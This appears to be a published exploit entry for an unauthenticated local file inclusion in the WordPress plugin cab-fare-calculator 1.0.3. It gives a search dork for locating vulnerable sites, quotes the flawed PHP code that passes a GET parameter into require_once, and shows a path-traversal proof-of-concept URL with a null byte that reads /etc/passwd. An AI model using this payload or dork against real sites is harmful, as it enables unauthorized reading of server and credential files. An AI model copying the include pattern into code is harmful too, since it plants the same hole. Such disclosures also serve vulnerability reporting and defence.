WordPress Cab-Fare-Calculator 1.0.3 Local File Inclusion

`# Exploit Title: WordPress Plugin cab-fare-calculator 1.0.3 - Local  
File Inclusion - Unauthenticated  
# Google Dork: inurl:/wp-content/plugins/cab-fare-calculator/  
# Date: 29-03-2022  
# Exploit Author: Hassan Khan Yusufzai - Splint3r7  
# Vendor Homepage: https://wordpress.org/plugins/cab-fare-calculator/  
# Version: 1.0.3  
# Tested on: Firefox  
# Contact me: h [at] spidersilk.com  
  
# Vulnerable File: tblight.php  
  
# Vulnerable Code:  
  
```  
if(!empty($_GET['controller']) && !empty($_GET['action']) &&  
!empty($_GET['ajax']) && $_GET['ajax'] == 1)  
{  
require_once('' . 'controllers/'.$_GET['controller'].'.php');  
}  
```  
  
# Proof of concept:  
  
http://localhost:10003//wp-content/plugins/cab-fare-calculator/tblight.php?controller=../../../../../../../../../../../etc/passwd%00&action=1&ajax=1  
<http://localhost:10003/wp-content/plugins/cab-fare-calculator/tblight.php?controller=../../../../../../../../../../../etc/index&action=1&ajax=1>  
  
# POC image:  
  
https://prnt.sc/9O8_akDp2HPC  
`